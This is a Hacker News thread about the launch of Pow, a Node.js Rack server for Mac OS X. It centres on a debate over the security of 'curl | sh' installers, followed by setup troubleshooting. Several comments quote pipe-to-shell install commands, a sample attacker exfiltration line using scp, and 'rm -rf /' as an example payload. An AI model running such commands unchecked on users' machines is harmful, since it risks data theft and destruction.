Hacker News new | comments | show | ask | jobs | submit login
Introducing Pow, a zero-configuration Rack server for Mac OS X (pow.cx)
253 points by wlll 2113 days ago | hide | past | web | 133 comments | favorite

Pow is a Node.js app written in CoffeeScript. It includes an HTTP and a DNS server and runs Rack apps by way of Josh Peek's Nack library: https://github.com/josh/nack

The screencast shows how it works and why we made it: http://get.pow.cx/media/screencast.mov

If you're interested, you can read the annotated source code, written in literate style and generated with the wonderful Docco: http://pow.cx/docs/

Run, don't walk, to read through the source... Sam's documentation is really enlightening, for folks who want to try their hand at building little servers in Node.


Very cool. Can't wait to dig into the source (learning node currently)!

This is a great web page, but I think it's borderline irresponsible to keep using this gimmick:

  curl get.pow.cx | sh
for installation. Yes, it's easy and slick. Yes, you'd have to read the code itself to make sure Pow didn't own your machine up after a secure install. Yes, you can just read the shell script. But 0.0001% of people playing with Pow will do that. Why make things easier for attackers at all?

This is an idea that I think started with Ximian back in 2000 and I think we're ready for it to die. It'd be neat if the authors of Pow were cool enough to strike it from their (otherwise amazing) front page.

(I'd also be happier if the thread where the guy explains how Pow works and what it's components are were voted higher than this comment.)

Why is this bad? I get why it seems offensive, but how is running a random shell script from some host any different than running some random software downloaded and installed from the same host? Anything malicious that the shell script could do could also be done by the software itself once installed, no? If they're from the same official source, why should one be considered more trustworthy than the other?

EDIT: Okay, I see it's because of the use of sudo. But graphical installers often require the root/administrator password, and could be equally destructive.

If you download an installer from an https:// link, even though you still aren't capital-S Secure, you're still more secure than running shell scripts spat out over TCP port 80.

So would,

    curl https://get.pow.cx/ | sh
Fix your complaint? Like the grandparent said, I'm not sure why curl | sh is any less secure than gem install or whathaveyou, in the oh-god-this-script-just-ran-rm-rf-/ sense.

It would improve the situation but I'm still not a fan of perpetuating the pipe-into-shell idiom.

The only meaningful difference between the two techniques is the extra step required to explicitly execute an installer. Is that your objection, that you don't like something being automatically executed upon download?

HTTPS, automatic installation, and UX that confounds security for end-users are my three objections to this gimmick.

I really don't see what's to object about. People who care about security can review it. People who just want it to work and don't care about security will blindly execute whatever instructions are written on the site. If the app is malicious then the latter group is screwed no matter what, doesn't matter whether it's 'curl | sh' or whether it's a .dmg/.zip/.tar.gz.

Your HTTPS suggestion makes sense, but can you explain your other two points by contrasting with "gem install"? How is the installation any more automatic? How does the UX confound security?

I was assuming HTTPS based on this thread chain, but even in practice, most installers I see aren't downloaded over HTTPS.

How does this practice confound security more than a normal installer? sudo asks for my password just as a normal installer would.

It's easier for a man in the middle to change a 15-line text script than to change a binary. Lowering that effort = increasing the odds and incidence of attempted attacks.

I request one thing, you send me something completely different. I don't see how making the "something" an ASCII script makes it easier than a random binary (and there's no requirement that the random binary has any relationship with what I requested).

Oddly, I'm more used to seeing arguments that distributing source code is better than distributing binaries because you can inspect source code.

The scenario isn't that I send you something different, but that somebody else gets in between us and tampers with the data. That's what https tries to avoid.

We're arguing levels of badness here so it's a little hokey. But if you decide to open up your machine to run arbitrary code, a machine that can run shell will arguably get more infections than one that runs executables. To infect the ladder any script kiddies will need to know a 'harder' language and at least how to compile it. It's a couple more hoops to jump through. In the other case I could drive by and do scp ~/mailbox me@myserver:

"Tampers with the data" is functionally equivalent to sending me something different. There's not requirement that it looks like what I requested at all, and as long as it will execute when double-clicked, it'll do the trick.

We're already talking about running arbitrary code on a machine, compiled versus interpreted is irrelevant. And I think you have forgotten that a script with the appropriate hash-bang and file permissions is indistinguishable to most users from a compiled executable.

Rubygems at least has a post-install hook that gem authors can execute automatically.

Just let me know when I can do: port selfupdate; port info ...

I thought everyone moved over to homebrew now :)

Sure, but a huge amount of software is distributed over plain old HTTP anyway. I agree that we should be using HTTPS for things like this, but I don't buy that curling a shell script is worse than downloading an installer over an unencrypted connection.

If you want https you can install from github:

curl https://github.com/37signals/pow/raw/master/install.sh | sh

No you're not! It's the same security issue.

You can for example, at your network level point get.pow.cx to a malicious script and you're done. That's the security issue, it has nothing to do with the HTTP protocol.

With that being said, I don't care, the risk is the same as downloading any software via http, in fact I loved it, so easy :-).

In fact it's much more transparent. With a compiled binary you don't see the steps involved, with a bash script you can step line by line and see exactly what the script is doing.

Those that don't care won't look at the script any more than they'll check the md5 hash of a binary to see that it's a legit binary. For those that care, they can look at the bash source.

Sorry, I just don't agree with this, but I also recognize it as a topic that we can nerd out over for hours and hours without improving the universe even a little. If what 'tptacek thinks about the security of software distribution means anything to you --- I'm not saying it has to --- then know that I think this is a bad idea that is only not causing problems because it is a gimmick used by so few projects.

I'm really, really trying to understand your viewpoint on this. How is this any more insecure than downloading (over HTTP) and running a graphical installer that requires your root password? Is it just because it takes a bit more effort to exploit a binary, given a MitM position, or am I missing something else?

We get that you think it is a bad idea, but don't know/understand why/how?

Since you are the security expert at Hn, we are trying to understand/learn from you.

This is not plain Nerdgasm making people understand about software security is making the world a little better.

You mean DNS spoofing. That only works if you can get a valid certificate at one of the recognized CAs. If you use a self-signed one curl will still complain unless -k is given. But then again, after the Comodo fiasco...

Hey Tom-

The installation process is short and fully documented: http://get.pow.cx/

The web site and manual encourage you to read it.

I think it's far more transparent than, say, an OS X Installer package.

Anyone who can run a tool to spoof DNS entries can run shell commands on machines that run this installer. Because so few people are going to install Pow relative to the population, I don't want to say this is a gigantic security problem. But the more people use this gimmick, the worse the issue gets.

I think you would be doing the universe a small but meaningful favor not to advertise this installation mechanism.

But it is a very cool tool and a really well-done site. Congrats!

Just as anyone who can spoof DNS entries could swap some other theoretical Pow installer with a malicious one.

I'm not seeing how Pow's installation process is any less secure than, say, downloading a disk image from a random site.

Not if it's served over SSL.

That has nothing to do with whether the installer is a shell script or a binary.

This comment is a repeat, but that may not necessarily be true:


Anybody can also spoof DNS entries to point rubygems.org/debian.org/centos.org/redhat.com to a malicious place where the packages contain postinstall scripts that run 'rm -rf /'.

Maybe for rubygems, not so easy for apt/rpm as they use gpg signing/verification of package indices.

RubyGems also have signing facilities. Most authors don't bother signing however because generating a key is too much trouble.

It might also be nice to have a Homebrew recipe, if it's possible to run it from /usr/local instead of ~/Library/Application Support (haven't dug through the code yet).

As another HN reader who does security for a living, perhaps I can add some specific points. (I know this thread is probably dead given that it is 1 day old, but I access this site via HN Daily now so bear with me.)

* No transport security. As many people mention, at least adding HTTPS would help with this. However, most non-browser SSL clients (wget, curl) don't include any root certs by default so even switching to SSL would not help this method. Firesheep, sslstrip, etc. automatically generate a self-signed cert which would look no different to wget than a real cert.

* No persistence. If you download any installer package once and then reuse it on multiple machines, you get the benefit of knowing that the same code was installed on each machine (good or bad). With this method, users may catch the site in the middle of an update and get multiple versions of the package.

* No authentication. Even with SSL, you only get strong transport security. You would know strongly that ".pow.cx" sent you some code, but not how that code got put on the server. With package-signing, typically done on the developer's end system, you know that it was protected even before it was uploaded to some site.

* Easier to trojan than binaries. Inserting a few extra shell commands in a single HTTP(S) session (say, targeting a single client IP) is much easier than building a custom binary package. Consider how hard it is to even compile Firefox with all the dependencies. Now do that work and insert a trojan and upload a separate 10 MB binary that needs to be stored somewhere on the server while waiting for that one client to visit the site. Compare this to keeping a two-line patch to a shell script (easily done in RAM, maybe even by hotpatch).

* Trains users that all the above is ok since the popularity of this "| sh" install method is relatively new. (Yes, I know about shar scripts in the past but those ended by 1996 or so with the advent of real package managers). It is absolutely impossible to retrofit "| sh" to be secure, whereas it is definitely feasible to add package signature verification support to gem or yum or apt or whatever (in fact, all those already support it).

The fact that many installers aren't signed today is not an ok to drive this process back to the 80's. We should be moving toward the future when package signing is a required part of being a software developer. Too hard? Well build tools to make this easier!

Well, just to play devil's advocate, do you read through the source code of MySQL, Apache, or RPM packages every time you install them?

With things like this that come from reputable sources, it's not unreasonable to put some trust in the source and some trust in the smaller percentage of developers who actually read the source code.

As other have pointed out above, the point is not where you think it is coming from, it is where it is actually coming from. Someone could easily man in the middle the connection and change the code you download, so your computer ran whatever they wanted you to run.

You say someone could "easily" man-in-the-middle the connection, but is it really that easy? Or likely? (Assuming you're not installing it from a random public wifi hotspot.)

Even so, assuming you want to be extra careful (you're installing it on a development machine with highly sensitive information), it's not that difficult to clone the repo and edit the install script to install from your local copy of the repo.

I don't think a brand-new webserver hack counts as a reputable source just yet.

I think 37signals counts as a reasonably reputable source if you're a Rails developer.

Oh, didn't notice that.

Agreed. The command made me nervous until I saw the 37signals logo. After that, I didn't think twice.

I mean yes, it does take a whole minute to verify that the pow code repo is on 37signals' GitHub organization account and that the repo references http://pow.cx.

Although I suppose it is possible that 37signals' GitHub account was hacked and someone maliciously designed a convenient Rack server and website with the intent of targeting the lucrative Rails developer demographic, or that the package the installer downloads is an insidious 37signals trojan not built from the code at the public repo.

Point taken.

This scripts vs binaries situation reminds me of something in the linux kernel: you can't use the sticky bit against scripts. When you add it, it shows as sticky in 'ls -lF' but doesn't work when you go to run it. Sticky bit is only for binaries.

It seems stupid, but on the other hand I never see people abusing the sticky bit, possibly as a result of the higher barrier to entry.

On the other hand, it causes me inconvenience every time I want to do something legitimate with it.

Scripts with interpreters expose a race condition vulnerability whereby an attacker can quickly replace the script with their own before the interpreter, running with higher level privileges, finishes loading.

It is not really a script vs. binary issue so much as protecting against how scripts are loaded.

I suppose you could define a curl wrapper that lets you review the file before passing it along to sh...

    curl_review() {
        result=`curl "$@"`
        echo "$result" > `tty`
        echo "Enter to proceed, Ctrl-C to abort:" > `tty`
        echo "$result"
Then just change curl to curl_review:

    curl_review get.pow.cx | sh
Of course this kind of defeats the purpose of these easy installation tricks.

I agree, if I put rm -rf / in that script you would be rightfully disappointed. Why would anyone trust someone to do this? When I download a script, I always read the code first.

Let's cut to the chase. OP is right. cUrl is a shitty way to install software. All these other arguments are peripheral to the central issue, which is simply that cUrl is a shitty way to install software. Reasons have already been given, arguments have already been made, and no difference has been made.

cUrl is a shitty way to install software.

Pow uses an interesting trick to get the *.dev urls resolving to localhost: it adds /etc/resolver/dev which acts as a resolv.conf for the .dev domain, and points to the nameserver at port 20560. The Pow server binds to that port and acts like a nameserver for .dev domains.

This is cool idea and I wish it was available for linux.

I love this. You simply create a symlink to your app, and boom, the app works at nameofthesymlink.dev. Even after a system restart. And pow is clever enough to only start workers if the app is accessed and shut them down when idle.

This is a blessing if you usually need multiple local apps running.

It also means you can now elegantly use local ruby webapps as personal desktop applications. Say you'd like to build a simple journal or expenses app to use on your desktop for personal use. You can now quickly build it with - say - Sinatra, Datamapper and SQLite. And no need to launch or quit it. Beautiful.

Thanks for posting this... after reading all the FUD, it really made my day.

Thanks for building and sharing it.

By the way, I didn't completely understand why I would use it instead of Thin until I had it running and had read http://pow.cx/manual.html. Maybe the mechanism I described in the first paragraph of the grandparent should be more prominently and clearly communicated? Maybe that's part of what you meant with the first two paragraphs under "Pow prevails over the forces of evil.", but in that case I think they could be more specific. But maybe that's just me.

Seriously, dude, nobody is out to get you. I'm glad you made Pow. Pow looks awesome. I don't control what gets voted to the top of the page, and I'm probably no happier than you are about the sprawling nerdwar that resulted.

Seriously, dude, nobody is out to get you. I'm glad you made Pow. Pow looks awesome. I don't control what gets voted to the top of the page, and I'm probably no happier than you are about the sprawling nerdwar that resulted.

Seriously, dude, get over yourself. It's pretty ridiculous how much FUD this project announcement received in here, versus positive focus. There are multiple other long FUD threads that missed the point of Pow; you only started (and kept throwing fire at) the one that doesn't even touch what the project is about.

I'm absolutely not interested in making people scared of Pow.

Especially after a system restart

Ok, we get it, some people are paranoid and afraid of running a "random script" and having to sudo to install it. Can we please have a discussion on the merits of the actual application. I just installed it - I trust 37signals enough to give them the benefit of the doubt - and love how simple it is to access different apps I'm working on at the same time without having to worry about configuration. Thanks 37signals.

Hooray! No more mucking around in /etc/hosts, .rvmrc, or .profile! Now you can muck around in ~/Library/Application Support/Pow/Hosts, .powrc, and .powenv instead!

Thanks but no thanks. Do yourself a favor and learn how to install rack and nginx. It's already dirt simple, and you'll save yourself having to go back and learn it when it's time to deploy your app somewhere other than your laptop.

Or, you could NOT muck about in ~/Library/Application Support/Pow/Hosts, .powrc, and .powenv, and just symlink your app directories into ~/.pow, which is probably how 99% of developers will use it.

In fairness to the parent post, it may not always be that simple. I installed, symlinked as you described and am currently looking at a page filled with "Pow: Error Starting Application". (Apparently it thinks I don't have Bundler installed. This is likely an issue because of pow + rvm + gemsets + factor x.)

The downside of zero configuration is "What do you do when it doesn't just work?" (I'm digging around the manual now...)

(A quick follow-up: The second app I symlinked in the exact same way does "Just work", so I don't doubt that there's something odd about my config for the first. Still, no fun to debug.)

As near as I can tell at the moment, it doesn't seem to respect any gemsets specified in your project .rvmrc, just the ruby interpreter specified.

Odd - my two apps have identical .rvmrc files (both using the same interpreter and gemset). Even odder, the first app is now working, and I'm completely not sure why.

If you haven't already, open Console.app, show the log list and there's a set of Pow logs in there. It might help out.

It turned out my issue was being caused because I was running an older version of rvm. Updating fixed it.

Incidentally, RVM is another software package with a curl-based install :)

$ bash < <( curl http://rvm.beginrescueend.com/releases/rvm-install-head )

And npm is another popular one. I'm not sure if the multiple examples helps your case or tptacek's though. (That is, we all seem to be getting more and more comfortable with this style of installation.)

tptacek has a good point that you shouldn't just trust any old curl-based install, but I think that really applies to any install of any kind. I think you have to consider the source of any software package, it's not something specific to this particular method.

To say that something is "zero-configuration" is complete marketing garbage. You get what you deserve if you choose to believe it.

Just what this thread needed, more FUD.

Not important, but why the ".cx" TLD? Is this intended to be pronounced a certain way?

I would guess it's more of a "pow.* was available for this TLD" decision.

What the hell it's written in node.js and coffeescript. Color me impressed. I'm now motivated to tackle this for python.

I don't know much about wsgi, but it seems like you could make a node.js <-> wsgi adapter pretty easily.

I'd love to see a WSGI adapter for Pow!

Check out Nack (https://github.com/josh/nack) to see how Pow runs Rack apps.

Indeed, that would be awesome if we could have the same kind of zero-conf, instant-deploy-via-symlink for wsgi/python apps.

gem install passenger

passenger start

no preference panes to install. No Apache configuration files to update. And Passenger eliminates the need to edit /etc/hosts. To get a Rack app running, just type a single command.

You conveniently omitted the step where you get an app running.

And upgrading Passenger requires you to install a gem, then run a command, copy and paste a bunch of text into your Apache config file, and restart Apache.

Not in the example he gave. He was using Phusion Passenger Standalone, i.e. not Phusion Passenger for Apache. Phusion Passenger Standalone does not require an external web server. It literally is just running 'passenger start'. No config files to edit. http://blog.phusion.nl/2010/07/01/the-road-to-passenger-3-te...

I'm a huge passenger fan, but I should note that:

* this is also a single command to get a rack app running once you have it installed

* you can easily support multiple ruby versions/gemsets (otherwise you'd need to install/compile passenger for each)

* appname.dev is easier than remembering which port all of your rails apps are running on.

* you don't have to start each app manually each time.

* Not sure what you mean.

* Passenger supports using various gemsets very easily using the setup_load_paths.rb file in the config of your app (though multiple ruby versions still seem to be a problem).

* If you're using passenger, why do you have each app running on a different port? Using the Passenger Prefs Pane makes it trivially easy to have each app at its own appname.local URL (though, admittedly, installing an extra prefs pane, where Pow has it built in, gives bonus points to the latter).

* Same with my last point. Passenger automatically handles the booting up or apps when you access their URL in the browser, just like Pow does. Of course, I'm guessing you don't have Passenger installed this way if each app has to run on a different port.

I should note that I'm mostly referring to the parent, which was referencing passenger standalone, which runs like a classic thin or mongrel.

There are some drawbacks to using Passenger/Mongrel/Webrick for development though, especially when you need to test subdomains and/or SSL.

How so? I've been using Passenger on my dev machine for over a year now. The original reason I installed Passenger on my dev machine was exactly because of how easy it was to get SSL and subdomains working; the app I was working on at the time had 100% SSL user logins, each routed to their own subdomains.

You're using it with Apache or Nginx though, right? Or were you able to get them working with Passenger Standalone?

Ah yes, you are correct, with Apache.

I did this and soon my computer was downloading and compiling nginx.

When this finished, I got an error and it all failed: "* ERROR: Please install file-tail first: sudo gem install file-tail"…

So I did and now its supposedly running on Port 3000 except I just get a 403 error when I visit it in my browser. The docs aren't very helpful either (http://www.modrails.com/documentation/Users%20guide%20Standa...).

Update: I apparently missed the line about going to my application's root directory. I still didn't really like all the stuff that got downloaded and compiled on my machine, when all I would like to do is get started developing.

I'm a Phusion Passenger developer. The goal for Phusion Passenger Standalone really is to have the command 'passenger start' Just Work(tm). After installing all required libraries, if it says it's running on port 3000 and it doesn't, then it's either a bug which we are dedicated to fix, or there might be something wrong with your system.

The 'file-tail' thing is actually a bug (we should no longer have a requirement on file-tail). We've already fixed it in git master 3 days ago and the fix will be released very soon.

Can you give me some more details about the 403 error? Do you see anything in the console or in the browser window that tells you more about the error?

Sorry :( I made a reading error and I updated my post.

It still seems like a lot of software and time to just start developing. What does passenger get me for developing locally that Pow doesn't? (I've never used Passenger before today).

I can't comment on how Phusion Passenger Standalone differs from Pow because I've never used Pow. However I can tell you what Phusion Passenger Standalone's benefits are:

1. Phusion Passenger is currently the most popular production server for Ruby web apps (see ruby-toolbox.com and the last NewRelic survey). Phusion Passenger Standalone is practically the same as Phusion Passenger for Nginx. It's a good thing to have the development environment match the production environment as much as possible. Phusion Passenger actually comes in 3 editions: Phusion Passenger for Apache (integrates into Apache), Phusion Passenger for Nginx (integrates into Nginx) and Phusion Passenger Standalone (can run by itself, does not require an external web server).

2. Because Standalone is based on an Nginx core it's even fit for production. According to the Pow website it uses Nack, which according to its website is not ready for production. If 'passenger start' works for you locally then you can run the same thing in production. No need to learn how Apache and Nginx works.

There are other things as well, but I have to go in a few minutes. Feel free to ask me more questions if you like.

As for "the stuff that got downloaded and compiled on my machine", that's Nginx being downloaded and compiled there. Nginx is a high-performance, lightweight, extremely stable, battle-tested and proven web server.

Hypothetically speaking, it's possible to modify Phusion Passenger to not download and install Nginx. We can run on a pure-Ruby web server like WEBrick. However I guarantee you, WEBrick sucks; it's slow, buggy and leaks memory.

A gem distribution of this would have been nice... simply so that instead of:

  $ curl get.pow.cx | sh
  $ cd ~/.pow
  $ ln -s /path/to/myapp
We could have:

  $ gem install pow
  $ pow /path/to/myapp

pow isn't written in ruby, but javascript. So it might be installable from npm soon.

If you `git clone git://github.com/37signals/pow.git`, you can install it from source with `npm install -g` (requires npm 1.0)


Pretty awesome. It took a restart to get it to work, but it's great now.

As a minor aside, is there a way to get Chrome to treat .dev domain the same as .com? Whenever I type in my .dev app name, it tries to google search for it.

+1, I'd like to know that.

In the meantime, you can access a new app the first time by entering http://myapp.dev (including the http://). Looks like after that, Chrome treats myapp.dev as desired.

Nice, you can change the env variable POW_DOMAIN to ".local". Much better in my opinion (works better with chrome at least)

EDIT: scratch that. You can't do this.

How much of this is OSX specific since it's a node.js app? Other than the launchctl and plist stuff could this be ported to linux?

The majority of the OS X -specific aspects have to do with how it launches (launchd .plist files) and how it automagically resolves .dev domains (using /etc/resolver - see: http://developer.apple.com/library/mac/#documentation/Darwin... )

Substituting launchd is easily done with any process launcher of your choice. As for the .dev TLD trick - that's a little harder, as OS X 10.6 has support for flat files inside /etc/resolver/* which the name of the file indicates what configuration/settings to use when resolving that domain. As such, they just drop a file named 'dev' in there and tell it to look to localhost on a custom port for DNS resolution. Then they run a mini DNS server on that port to resolve .dev domains to localhost.

Probably the only way to do something similar to this for linux would be to run a name server of your own on your box and add a custom zone configuration for the .dev TLD and recursive lookup for anything else.

Yea this is interesting, with a little fiddling I was able to get the webserver up. It's not picking up my app yet. Though I'm not sure if it's because it's not being initialized or because I can't reach it due to not having the dns setup.


This is very nice documentation. Is it generated using a freely available tool?

Generated with Docco: http://jashkenas.github.com/docco/

As an aside, does anyone know what was used to generate the "Annotated Source" code listings? They look absolutely beautiful. Were they generated from the underlying source, or put together by hand?

I don't see any connection between being "super-hero" and a mindset when you don't know how your code works inside.

Installation wasn't easy or slick here:

  *** Installing local configuration files...

  /Users/bonaldi/Library/Application Support/Pow/Versions/0.2.2/lib/command.js:50
            throw err;
  Error: EACCES, Permission denied   '/Users/bonaldi/Library/LaunchAgents/cx.pow.powd.plist'

If anyone else sees this, the script assumes it can write to ~/Library/LaunchAgents as you. Make sure you can!

Maybe it's just me but I can not seem to get any application to work. Chrome just says "Server Not Found". I tried to check the logs in ~/Library/Logs/Pow but the directory doesn't even exist. Didn't know if it was something silly before I created a ticket on Github.

yep, same thing here. I get this if I launch it manually on 10.6.7:

  launchctl load "$HOME/Library/LaunchAgents/cx.pow.powd.plist" 
Bug: launchctl.c:2325 (23930):13: (dbfd = open(g_job_overrides_db_path, O_RDONLY | O_EXLOCK | O_CREAT, S_IRUSR | S_IWUSR)) != -1 launch_msg(): Socket is not connected

When I ran this, I got the following error: "launchctl: Dubious permissions on file (skipping)"

The file was chmodded to 664; changing it to 644 did the trick.

it's seems to have something to do with Iterm or tmux. It works using the terminal.

edit: I only get the error using tmux, strange..

yeah, that seemed to have fixed it. Terminal works, iTerm doesn't.

Same problem, but using Terminal.

Fixed with restarting my machine. And it's worth it.

A shell function to add directories to ~/.pow:

    function pow {
        if [ -d "`cd $1; pwd`" ]; then
            ln -s "`cd $1; pwd`" ~/.pow/

I do not much like this 'curl $random_url | sh' installation method. I am not going to be running some random script without looking long and hard at it first.

Why not just download it and then read it yourself? Do you enter your root password when installing some GUI applications?

At least in this instance you can read over the commands that will be run beforehand—in fact, Sam actively encourages you to do so.

I don't understand how this is any different from running the application after you install it by whatever other method. Your shell doesn't have some higher level of access than most other software.

> I don't understand how this is any different from running the application after you install it

I'll tell you one difference. It takes me 10 minutes to review the shell based installer. It takes a whole lot longer to inspect an installation package or application source code.

Completely understandable. That's why the installer source is fully documented and linked up for your review. http://get.pow.cx/

This just goes to show that there will be naysayers for literally every good idea.

It's a one-page script and a reasonably small, public git repo, from a company that doesn't exactly have a reputation for hacky, unreliable software.

Do you read through the source of every piece of software you download and install? If not then why worry about one shell script?

Then 'curl get.pow.cx > pow.sh'. Take you time and look at the script, then run it. Worked for me.

Let's take an informal poll: how many people grousing about the installation method were actually planning to install and use this?

I have no f*kin'idea how you did this, guys. But the result is amazing even for us, casual weekend spaghetti coders ;-)

It would be nice if there were an easy way to start/stop pow when needed.

That x86_64 node executable doesn't play nice with Core Duo Mac's.

Great stuff!

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | DMCA | Apply to YC | Contact